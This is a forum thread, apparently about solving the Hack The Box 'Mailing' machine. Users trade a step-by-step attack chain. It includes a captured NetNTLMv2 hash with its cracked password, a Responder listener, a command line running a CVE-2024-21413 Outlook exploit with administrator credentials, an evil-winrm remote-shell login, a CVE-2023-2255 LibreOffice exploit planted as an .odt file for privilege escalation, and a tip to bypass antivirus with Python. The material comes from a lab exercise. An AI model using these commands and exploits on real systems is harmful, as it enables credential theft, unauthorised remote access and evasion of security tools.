Posts: 33
Threads: 1
Joined: Apr 2024
(May 04, 2024, 09:38 PM)iNone Wrote: (May 04, 2024, 09:17 PM)s1nn Wrote: (May 04, 2024, 09:06 PM)trevor69000 Wrote: its somewhere here cant get
https://github.com/xaitax/CVE-2024-21413...me-ov-file
maya::MAILING:dac4fe0aec512cc8:0ABF7016C9D7428230E543395441DBCD:010100000000000000EF6F99469EDA01293B5F358D9EF4DE0000000002000800540058005800340001001E00570049004E002D00380038003200520041004E005000380044004500500004003400570049004E002D00380038003200520041004E00500038004400450050002E0054005800580034002E004C004F00430041004C000300140054005800580034002E004C004F00430041004C000500140054005800580034002E004C004F00430041004C000700080000EF6F99469EDA01060004000200000008003000300000000000000000000000002000009BE5ABAC0CB766267616E7031B83C21B57E7A52A6903503167DE1974F23E1F3B0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0035000000000000000000
maya:m4y4ngs4ri
sudo responder -I tun0
python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\<ip>' --subject XD
And maya:m4y4ngs4ri for what?? how you get a rev shell?
evil-winrm
Posts: 87
Threads: 28
Joined: Apr 2024
evil-winrm -i <ip> -u maya -p m4y4ngs4ri
Posts: 19
Threads: 1
Joined: Mar 2024
(May 04, 2024, 09:17 PM)s1nn Wrote: (May 04, 2024, 09:06 PM)trevor69000 Wrote: its somewhere here cant get
https://github.com/xaitax/CVE-2024-21413...me-ov-file
maya::MAILING:dac4fe0aec512cc8:0ABF7016C9D7428230E543395441DBCD:010100000000000000EF6F99469EDA01293B5F358D9EF4DE0000000002000800540058005800340001001E00570049004E002D00380038003200520041004E005000380044004500500004003400570049004E002D00380038003200520041004E00500038004400450050002E0054005800580034002E004C004F00430041004C000300140054005800580034002E004C004F00430041004C000500140054005800580034002E004C004F00430041004C000700080000EF6F99469EDA01060004000200000008003000300000000000000000000000002000009BE5ABAC0CB766267616E7031B83C21B57E7A52A6903503167DE1974F23E1F3B0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0035000000000000000000
maya:m4y4ngs4ri
sudo responder -I tun0
python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\<ip>' --subject XD
How do you know recipient is maya?
Posts: 33
Threads: 1
Joined: Apr 2024
and im stucking on root...
Posts: 196
Threads: 31
Joined: Apr 2024
(May 04, 2024, 09:48 PM)imassxck Wrote: and im stucking on root...
I cried havoc and let slip the hounds.....but it told me to fuck off thats a virus
Posts: 55
Threads: 2
Joined: Jul 2023
(May 04, 2024, 09:57 PM)maggi Wrote: (May 04, 2024, 09:48 PM)imassxck Wrote: and im stucking on root...
I cried havoc and let slip the hounds.....but it told me to fuck off thats a virus
use python to bypass AV
Posts: 1
Threads: 0
Joined: May 2024
Posts: 5
Threads: 0
Joined: Apr 2024
(May 04, 2024, 09:17 PM)s1nn Wrote: (May 04, 2024, 09:06 PM)trevor69000 Wrote: its somewhere here cant get
https://github.com/xaitax/CVE-2024-21413...me-ov-file
maya::MAILING:dac4fe0aec512cc8:0ABF7016C9D7428230E543395441DBCD:010100000000000000EF6F99469EDA01293B5F358D9EF4DE0000000002000800540058005800340001001E00570049004E002D00380038003200520041004E005000380044004500500004003400570049004E002D00380038003200520041004E00500038004400450050002E0054005800580034002E004C004F00430041004C000300140054005800580034002E004C004F00430041004C000500140054005800580034002E004C004F00430041004C000700080000EF6F99469EDA01060004000200000008003000300000000000000000000000002000009BE5ABAC0CB766267616E7031B83C21B57E7A52A6903503167DE1974F23E1F3B0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0035000000000000000000
maya:m4y4ngs4ri
sudo responder -I tun0
python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\<ip>' --subject XD
I'm a bit late to the party on this one, but <ip> is just supposed to be our attacking IP, yes? I'm getting confirmation that the mail is being sent, but I'm hearing zip on my responder interface. Even ran tcpdump to ensure things were being sent.
Posts: 55
Threads: 2
Joined: Jul 2023
(May 04, 2024, 10:11 PM)heyitswilson Wrote: any hint for root
use this CVE-2023-2255 for root
https://github.com/elweth-sec/CVE-2023-2255
put a odt in this path C:\Important Documents\
localadmin runs it
Posts: 8
Threads: 0
Joined: Apr 2024
May 04, 2024, 11:32 PM
(This post was last modified: May 04, 2024, 11:45 PM by CodeineBenzos.)
(May 04, 2024, 10:46 PM)DataNinja Wrote: (May 04, 2024, 10:11 PM)heyitswilson Wrote: any hint for root
use this CVE-2023-2255 for root
https://github.com/elweth-sec/CVE-2023-2255
put a odt in this path C:\Important Documents\
localadmin runs it
![[Image: AzgzHri.png]](https://i.imgur.com/AzgzHri.png)
Should i run it on attacker terminal or in evil-winrm, im trying to understand this.
EDIT: nvm i'm just dumb, i created the odt. Uploading it to C:\Important Documents lets see if it works
|